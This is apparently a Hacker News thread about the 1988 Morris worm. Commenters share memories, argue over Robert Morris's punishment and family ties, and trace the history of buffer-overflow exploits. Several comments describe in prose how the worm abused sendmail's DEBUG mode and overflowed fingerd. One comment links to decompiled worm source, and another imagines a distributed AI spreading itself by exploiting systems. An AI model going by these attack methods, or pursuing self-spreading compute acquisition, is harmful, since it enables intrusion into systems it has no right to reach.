Great course by the way.
username: field
password: technician
On a sidenote, what did you do after the course?
It is an amazing course though!
I was an intern at IBM in '88 and they shut-down the (iirc) two internet getaways to their corporate network (vnet) while people figured out what was going on. News moved slowly back then, and the idea of self-replicating software was unusual. Although IBM had had its own replicator the previous year [2].
[1] https://www.cs.columbia.edu/~gskc/security/rochlis89microsco...
floppy based viruses were well established and quite common
Memories of adding an illicit McAffee to autoexec.bat on my boot floppies...
The Mac's ease of use as opposed to the PC made it also the juiciest virus target.
Even UUCP was still really fringe and those weren't actually connected hosts on tcp/ip. They had their own dialup mail exchange protocol similar to fidonet.
I also used uucp for a few years though it soon got replaced with full internet. We were bit behind in Europe and we caught up fast. In the beginning I also had to use bang paths to avoid some misconfiguration upstream. Fido was actually better at this and the tool chain much more user-friendly. Though you still needed multiple. There was one to do the dial up and one to sort the retrieved mail, a "tosser" :)
Start here: https://en.wikipedia.org/wiki/Email
If that’s too much, think of the internet as a series of tubes, and email as a digital boomerang that returns with an out-of-office reply attached.
https://snl.no/Pål_Spilling#:~:text=Da%20Spilling%20kuttet%2...
Not much was happening in the Eng and CS buildings on campus (except for those that had to deal with the worm).
I'm not dunking on Paul Graham here. If you know anything about me, if anything, this is a point in his favor. :)
Not sure if that was supposed to be sarcasm[1] or was intended seriously, but for what it's worth Hafner & Markoff have frequently received a lot of criticism for playing fast and loose with the truth in that book. Now most of that is specifically in regards to their treatment of Mitnick, and I'm not making any particular accusation here. Just sharing a thought that "it's in Katie Hafner and John Markoff's book" might not be terribly strong evidence of $WHATEVER.
Thanks for the answer, I'll check out the book.
It's a great read, but to echo what I said above: there have been a lot of questions over the years about the veracity of some of the details of their book. Take that for what it's worth. I enjoyed it enough that I've read it 3 or 4 times, but I do also suggest consulting other books on the same stories - particularly the stuff around K. Mitnick.
Clifford Stoll, author of The Cuckoo's Egg, wrote that "Rumors have it that [Morris] worked with a friend or two at Harvard's computing department (Harvard student Paul Graham sent him mail asking for 'Any news on the brilliant project')".
Has pg commented on this?
Some quotes from that:
> The worm, no one would have ever known that the worm existed, except there was a bug in it. That was the problem. The worm itself was absolutely harmless. But there was a bug in the code that controlled the number of copies that would spread to a given computer. And so the computer would get like 100 copies of the worm running on it, back in the day, when having 100 processes running on your computer would be enough to crash it.
>he called me and told me what had happened.
As someone who is old enough to have been a teenage hacker back in this timeframe and who spent his time on old Diversi Dial dialup systems which lead to early internet systems via gnu/fsf's open access policy, which lead to bitnet relay, and who was around during the initial development of irc right around this very year (1988) I can say that it was absolutely considered a bad act to do this sort of thing back then even as just a prank or demonstration (which made it kind of cool to back-then me, as a teenager, but which made it certainly unethical in a professional sense even for the time).
... however when you oopsied and the shit hit the fan, you could get away with it if your dad worked for the NSA.
The vast majority of people who weren't RTM would have had a far more severely negative outcome in his situation.
https://www.google.com/search?q=site%3Apaulgraham.com+%22mor...
It’s been a long time since I read the book, but IIRC Cliff visited with Robert Morris (rtm’s dad) at the NSA when he traveled to Washington DC, and I think the worm and rtm are mentioned after he meets with the elder Robert.
Put everything in MicroSoft Active Directory. Wait until it gets hacked. You will lose DNS, DHCP, Email, file servers, web servers, endpoints, etc. Obviously, running a mono-culture is a dumb thing to do if you want to keep your business running.
Maybe instead, run BIND on Linux servers, Apache on OpenBSD servers, have some Chromebooks, some Macs, etc. so everything doesn't go down together.
Really, it's not overblown... it's just common sense to diversify. Like we do with our diet/nutrition, with our financial investments, etc.
So by running BIND on Linux and Apache on OpenBSD and trying to tie it all into MSAD, what you're really doing is just expanding your attack surface, and once any of those are broken, attackers won't have to care about the state of the art in vulnerabilities to extend access from there.
The "monoculture" stuff is a product of a time when security pundits worried Microsoft was running the table on corporate IT. We're (generally) SAAS startup people here and very few of us run any Microsoft stuff. Almost all of us are better off extensively hardening a single Linux server environment than we are in deliberately trying to sprinkle NetBSD and Microsoft servers. That's doesn't improve security; it just turns your network into a CTF challenge.
I'm not so sure the Morris worm was the turning point.
Since it's all locked up, I just reboot the big vax single user - that takes about 10 minutes so I also start on a couple of the suns. You have to realize that everything including desktops runs sendmail in this era, and when some of these machines come up they are ok for a sec and then sendmail starts really eating into the cpu.
I'm pretty bleary eyed but I walk around restarting everything single and taking sendmail out of the rcs. The TMC applications engineer comes in around 7 and gets me a cup of coffee. He manages to get someone to pick up in Cambridge and they tell him that's happening everywhere.
I knew Robert Morris was the financier of the Revolution. I know it's a plucky university outside of Pittsburgh with basketball and hockey programs that punch above their weight. I know there's a pastor in Texas who is...in some legal trouble...with the same name.
Now I have another one to remember!
As someone who wasn't taught better (partly due to not picking CS as a career stream), are there any languages which avoid such vulnerability issues? Does something like rust help with this?
Xerox PARC started with BCPL for their systems, but eventually created Mesa exactly for safe systems programming.
https://en.wikipedia.org/wiki/Mesa_(programming_language)
http://toastytech.com/guis/star.html
"The Mesa Programming Environment" - very first IDE for a systems language
https://www.digibarn.com/friends/curbow/star/XDEPaper.pdf
While Pascal as originally designed wasn't suitable for systems programming, and various dialects sprung out of it, with Object Pascal from Apple/Borland being the most famous one, by 1978 the first standard for Modula-2 was released, which was inspired in Mesa, after Niklaus Wirth spent a sabaticall year at Xerox PARC. Years later, through a similar experience, the evolution of Mesa (Cedar) would influence him to come up with Oberon.
https://en.wikipedia.org/wiki/Modula-2
https://www.modula2.org/modula2-history.php
Then there was Ada, although too expensive to get compilers and high hardware requirements for 1980's computers.
Also all BASIC compilers in the 8 and 16 bit home computers had support for low level systems programming.
In recent programming languages, something like Zig would be the closest to what those languages were offering, in safety without having a GC of some form.
Naturally this takes cares of most C flaws, minus use-after-free, however due to their type systems, one tends to use heap allocations less than in C, although it remains an issue.
1) He released it from MIT to avoid suspicion.
2) After he was convicted, he went from Cornell to Harvard to complete his Ph.D.
3) He became an assistant professor at MIT after that.
He had to be really spectacular/have crazy connections to still be able to finish his training at a top program and get a job at the institution he tried to frame.
Bob Morris wrote crypt(1), dc(1), crypt(3), libm, co-wrote the rainbow series, and did additional unknown work as a cryptographer for the NSA.
dmr writes about working with Bob Morris here: https://web.archive.org/web/20250121041734/https://www.bell-...
---
¹Awarders of the Ig Nobel prize
He was and is very smart. This is not disputed. He was 23 at the time. Not exactly a child.
The worm was surprisingly elaborate containing three separate remote exploits.
It probably took a few weeks to build and test.
So sabotaging thousands of at the time very expensive network connected computers was a very deliberate action.
I posit that he likely did it to become famous and perhaps even successful, feeling safe with his dad’s position. And it worked. He did not end up in prison. He ended up cofounding Viaweb and YCombinator.
Unironically a great role model for YC. :/
Edit: I am not American. Please realize that I meant exactly what I wrote and not what some of you now imagine that I wrote. I have high trust in you!
To clarify: not a Trump fan.
He didn't reoffend (as far as we know), and in fact went on to become a highly-contributing member of society. His crime was not so egregious that recompense was impossible even in principle. I don't see how a harsher punishment for him would have produced an obviously better outcome. I think it would be more productive to argue that people who commit similar crimes should receive similar punishments as this, rather than arguing that he should have received a harsher punishment.
Everyone hacked. When the internet was connected to Sydney University early 90s, all the students were grabbing Stanfords /etc/passwd files and peeking at the open X displays of people in Sweden. Etc. All for fun / curiosity.
You can be sure that even rtm's Dad did similar, perhaps confined to his lab / peers.
Thank you for constantly removing some of the veils from the mystery of our computational universe.
The notion that you’re a very obvious leftist seems asinine to anyone who has seen your comment history in these digital catacombs for the last decades.
Is there something wrong with being a "leftist"?
His dad's also a badass and super fun to talk to. Never talked to the son though, but I'd love to some day.
Interesting random factoid: RTM's research in the early 2000s was on Chord [1], one of the earliest distributed hash tables. Chord inspired Kademlia [2], which later went on to power Limewire, Ethereum, and IPFS. So his research at MIT actually has had a bigger impact in terms of collected market cap than most YC startups have.
But looking into the specifics again after all these years [1], I read:
"The N.S.A. wanted to clamp a lid on as much of the affair as it could. Within days, the agency’s National Computer Security Center, where the elder Morris worked, asked Purdue University to remove from its computers information about the internal workings of the virus."
and that CERT at CMU was one response to the incident [2].
So there is a whiff of the incident being steered away from public prosecution and towards setting up security institutions.
Robert Morris did get a felony conviction, three years probation, and a $10K fine. As for hn users, aside from pg, Cliff Stoll has a minor role in the story.
[1] https://archive.nytimes.com/www.nytimes.com/times-insider/20...
Maybe I’m just getting old, but it seems like nothing was such a big deal at the time.
Everything seems to have gotten more uptight in the last few decades. I used to have a metal cutlery set that an international airline gave to every passenger on the plane.
”Computer crime” definitely was though.
And by the mid to late 90's (I'd say about 1997) it was finally becoming "received wisdom" to most hacker that "this is real now: getting caught doing this stuff could mean actual jail time, fines, not getting into college, losing jobs, etc." Now I grew up in a rural part of NC and so we probably lagged other parts of the country in terms of information dispersal, so I expect other people view the timeline differently, so YMMV.
What you didn't have back then was financial fraud on the scale that happens today, where even nominal damages run into 8-9 figures.
MIT really respects good hacks and good hackers. It was probably more effective than sending in some PDF of a paper.
Oooof in light of Aaron Swartz. He plugged directly into a network switch that was in an unlocked and unlabelled room at MIT so he could download faster and faced "charges of breaking and entering with intent, grand larceny, and unauthorized access to a computer network".
MIT really didn't lift a finger for this either.
>Swartz's attorneys requested that all pretrial discovery documents be made public, a move which MIT opposed
It's very hard to extract Robert Tappan Morris from the context of his father being an extremely powerful man when trying to figure out how he managed to get away with what he did.
MIT faulted over its support for students https://www.bostonglobe.com/metro/2014/02/14/mit/9VBBq9pBQ1z... https://news.ycombinator.com/item?id=7411312
Has the decompiled version.
- a github repo containing "the original, de-compiled source code for the Morris Worm" - see https://github.com/agiacalone/morris-worm-malware
- a high level report about the worm - see https://www.ee.torontomu.ca/~elf/hack/internet-worm.html
However the article has been updated so only the HN title has this flaw.
However I think this is a solvable problem, and I started solving it a while ago with decent results:
https://github.com/Hello1024/shared-tensor
When someone gets this working well, I could totally see a distributed AI being tasked with expanding it's own pool of compute nodes by worming into things and developing new exploits and sucking up more training data.
It doesn’t need to be fully decentralized, the control plane just needs some redundancy
You don’t need a full host compromise to send network traffic
He was sentenced to pay $10,050, today he would not get away that easily I guess...
Another thing I didn't know (citing Wikipedia):
"In 1995, Morris cofounded Viaweb with Paul Graham, a start-up company that made software for building online stores. It would go on to be sold to Yahoo for $49 million[14], which renamed the software Yahoo! Store. "
and (same source):
"He is a longtime friend and collaborator of Paul Graham. Along with cofounding two companies with him, Graham dedicated his book ANSI Common Lisp to Morris and named the programming language that generates the online stores' web pages RTML (Robert T. Morris Language) in his honor."
60k computers ( mostly at institutions ) in 20 countries
Insomnia paid off a lot back then.
had RTM actually RTM the world might be a bit different than it is today.
He did do us all a service; people back then didn't seem to realize that buffer overflows were a security risk. The model people had then, including my old boss at one of my first jobs in the early 80s, is that if you fed a program invalid input and it crashed, this was your fault because the program had a specification or documentation and you didn't comply with it.
It was Thomas Lopatic and 8lgm that really lit a fire under this (though likely they were inspired by Morris' work). Lopatic wrote the first public modern stack overflow exploit, for HPUX NCSA httpd, in 1995. Later that year, 8lgm teased (but didn't publish --- which was a big departure for them) a remote stack overflow in Sendmail 8.6.12 (it's important to understand what a big deal Sendmail vectors were at the time).
That 8lgm tease was what set Dave Goldsmith, Elias Levy, San Mehat, and Pieter Zatko (and presumably a bunch of other people I just don't know) off POC'ing the first wave of public stack overflow vulnerabilities. In the 9-18 months surrounding that work, you could look at basically any piece of privileged code, be it a remote service or an SUID binary or a kernel driver, and instantly spot overflows. It was the popularization with model exploits and articles like "Smashing The Stack" that really raised the alarm people took seriously.
That 7 year gap is really wild when you think about it, because during that time period, during which people jealously guarded fairly dumb bugs, like an errant pipe filter input to the calendar manager service that run by default on SunOS shelling out to commands, you could have owned up literally any system on the Internet, so prevalent were the bugs. And people blew them off!
I wrote a thread about this on Twitter back in the day, and Neil Woods from 8lgm responded... with the 8.6.12 exploit!
Mitnick didn't write any of this tooling --- presumably someone in jsz's circle did --- but it also wasn't super easy to use; spoofing tools of that vintage were kind of a nightmare to set up.
https://seclists.org/bugtraq/1995/Feb/109
> we've installed the NCSA HTTPD 1.3 on our WWW server (HP9000/720, HP-UX 9.01) and I've found, that it can be tricked into executing shell commands. Actually, this bug is similar to the bug in fingerd exploited by the internet worm. The HTTPD reads a maximum of 8192 characters when accepting a request from port 80.
I ps aux'ed and saw a hell of a lot of sendmail demons running, but didn't realize till the next morning that we were actively under attack, being repeatedly but unsuccessfully finger daemon gets(3) buffer overflowed, and repeatedly and successfully sendmail daemon DEBUG'ed.
RTM's big mistake was not checking to see if a machine was already infected before re-infecting it and recursing, otherwise nobody would have noticed and he would have owned the entire internet.
What's funny is that UMD was on MILNET via NSA's "secret" IMP 57 at Fort Mead, so RTM's worm was attacking us through his daddy's own MILNET PSN (Packet Switching Node)!
https://news.ycombinator.com/item?id=18376750
>At the University of Maryland, our network access was through the NSA's "secret" MILNET IMP 57 at Fort Mead. It was pretty obvious that UMD got their network access via NSA, because mimsy.umd.edu had a similar "*.57" IP address as dockmaster, tycho and coins.
>[...] Once I told the guy who answered, "Hi, this is the University of Maryland. Our connection to the NSA IMP seems to be down." He barked back: "You can't say that on the telephone! Are you calling on a blue phone?" (I can't remember the exact color, except that it wasn't red: that I would have remembered). I said, "You can't say NSA??! This is a green phone, but there's a black phone in the other room that I could call you back on, but then I couldn't see the hardware." And he said "No, I mean a voice secure line!" I replied, "You do know that this is a university, don't you? We only have black and green phones."
>[...more stuff about the rumored "Explosive Bolts" that could separate ARPANET and MILNET from Erik Fair and Milo Medin...]
More from Jordan Hubbard about his infamous "rwall" incident, when he accidentally sent an rwall message to almost every Unix host on the internet. I received it and sent him a cheerful reply within minutes, which he said was nicer than most of the 743 replies he got. Also: Milo Medin's description of Dennis Perry's reaction (head of DARPA/IPTO) to getting his Interleaf windows scribbled on ("absolutely livid"), Mark Crispin's flame about security, Jordan's response, and Dennis Perry himself replying to Jordan.
https://news.ycombinator.com/item?id=31822138
From: Dennis G. Perry <PERRY@vax.darpa.mil>
Date: Apr 6, 1987, 3:19 PM
Jordan, you are right in your assumptions that people will get annoyed
that what happened was allowed to happen.
By the way, I am the program manager of the Arpanet in the Information
Science and Technology Office of DARPA, located in Roslin (Arlington), not
the Pentagon. [...]
Here's my story of The Night of The Worm:https://news.ycombinator.com/item?id=29250313
DonHopkins on Nov 17, 2021 | parent | context | favorite | on: .plan
Yeah, 4.2 BSD fingerd was calling "gets" to read the name of who you were fingering into a small fixed size buffer on the stack.
https://man7.org/linux/man-pages/man3/gets.3.html
Chris Torek had hacked our version of fingerd (running on mimsy.umd.edu and its other Vax friends brillig, tove, and gyre) to implement logging, and while he was doing that, he noticed the fixed size buffer, and thoughtfully increased the size of the buffer a bit. Still a fixed size buffer using gets, but at least it was a big enough buffer to mitigate the attack, although the worm got in via sendmail anyway. And we had a nice log of all the attempted fingerd attacks!
The sendmail attack simply sent the "DEBUG" command to sendmail, which, being enabled by default, let you right in to where you could escape to a shell.
Immediately after the attack, "some random guy on the internet" suggested mitigating the sendmail DEBUG attack by editing your sendmail binary (Emacs hackers can do that easily of course, but vi losers had to suck eggs!), searching for the string "DEBUG", and replacing the "D" with a null character, thus disabling the "DEBUG" command.
But unfortunately that cute little hack didn't actually disable the "DEBUG" command: it just renamed the "DEBUG" command to the "" command! Which stopped the Morris worm on purpose, but not me by accident:
I found that out the day after the worm hit, when I routinely needed to check some bouncing email addresses on a mailing list I ran, so I went "telnet sun.com 80" and hit return a couple times like I usually do to clear out the telnet protocol negotiation characters, before sending an "EXPN" command. And the response to the "EXPN" command was a whole flurry of debugging information, since the second newline I sent activated debug mode by entering a blank line!
So I sent a friendly email to postmaster@sun.com reporting the enormous security hole they had introduced by patching the other enormous security hole.
You'd think that the Long Haired Dope Smoking Unix Wizards running the email system at sun.com wouldn't just apply random security patches from "some random guy on the internet" without thinking about the implications, but they did!
https://www.ee.torontomu.ca/~elf/hack/internet-worm.html
>The Sendmail Attack:
>In the sendmail attack, the worm opens a TCP connection to another machine's sendmail (the SMTP port), invokes debug mode, and sends a RCPT TO that requests its data be piped through a shell. That data, a shell script (first-stage bootstrap) creates a temporary second-stage bootstrap file called x$$,l1.c (where '$$' is the current process ID). This is a small (40-line) C program.
>The first-stage bootstrap compiles this program with the local cc and executes it with arguments giving the Internet hostid/socket/password of where it just came from. The second-stage bootstrap (the compiled C program) sucks over two object files, x$$,vax.o and x$$,sun3.ofrom the attacking host. It has an array for 20 file names (presumably for 20 different machines), but only two (vax and sun) were compiled in to this code. It then figures out whether it's running under BSD or SunOS and links the appropriate file against the C library to produce an executable program called /usr/tmp/sh - so it looks like the Bourne shell to anyone who looked there.
>The Fingerd Attack:
>In the fingerd attack, it tries to infiltrate systems via a bug in fingerd, the finger daemon. Apparently this is where most of its success was (not in sendmail, as was originally reported). When fingerd is connected to, it reads its arguments from a pipe, but doesn't limit how much it reads. If it reads more than the internal 512-byte buffer allowed, it writes past the end of its stack. After the stack is a command to be executed ("/usr/ucb/finger") that actually does the work. On a VAX, the worm knew how much further from the stack it had to clobber to get to this command, which it replaced with the command "/bin/sh" (the Bourne shell). So instead of the finger command being executed, a shell was started with no arguments. Since this is run in the context of the finger daemon, stdin and stdout are connected to the network socket, and all the files were sucked over just like the shell that sendmail provided.
While we're much more conscientious and better at security than we were way back then, things are certainly not totally secure.
The best answer I have is the same as what a bio professor told me once about designer plagues: it hasn't happened because nobody's done it. The capability is out there, and the vulnerability is out there.
(Someone will chime in about COVID lab leak theories, but even if that's true that's not what I mean. If that happened it was the worst industrial accident in history, not an intentional designer plague.)
https://en.wikipedia.org/wiki/Botnet#Historical_list_of_botn...
I could be wrong, but I've come to believe that despite the hype they have very little capability.
https://en.wikipedia.org/wiki/Blaster_(computer_worm)
https://en.wikipedia.org/wiki/SQL_Slammer
https://en.wikipedia.org/wiki/Sasser_(computer_worm)
Bill Gates sent out the "Trusted Computing" memo to harden Windows and make it somewhat secure.
Essentially, Windows used to be trivial to exploit, in that Every single service was by default exposed to the web, full of very trivial buffer overflows that dovetailed nicely into remote code execution.
Since then, Windows has stopped exposing everything to the internet by default and added a firewall, fixed most buffer overflows in entry points of these services, and made it substantially harder to turn most vulnerabilities into the kind of remote code execution you would use to make simple worms.
>better at security than we were way back then
In some ways this is dramatically understated. Now the majority of malware comes from getting people to click on links, targeted attacks that drop it, piggyback riding in on infected downloads, and other forms of just getting the victim to run your code. Worms and botnets are either something you "Willingly" install through "free" VPNs, or target absolutely broken and insecure routers.
The days where simply plugging a computer into the internet would result in you immediately trying to infect 100 other computers with no interaction are pretty much gone. For all the bitching about forced updates and UAC and other security measures, they basically work.
It's most obviously paralleled by Samy Kamkar's MySpace worm, which exploited fairly similar too-much-trust territory.